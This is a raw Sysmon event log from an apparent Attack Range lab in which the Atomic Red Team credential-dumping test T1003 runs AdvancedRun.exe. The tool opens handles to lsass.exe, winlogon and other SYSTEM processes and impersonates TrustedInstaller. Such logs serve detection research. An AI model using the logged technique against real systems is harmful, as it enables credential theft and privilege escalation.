17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952206Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952205Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952204Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952203Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952202Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952201Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952200Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952199Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952198Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 534500x80000000000000003952197Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003952196Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952195Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003952194Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003952193Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952190Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003952189Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003952188Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED47-61EA-7A03-000000002702}5868C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952187Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED47-61EA-7A03-000000002702}5868C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952186Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 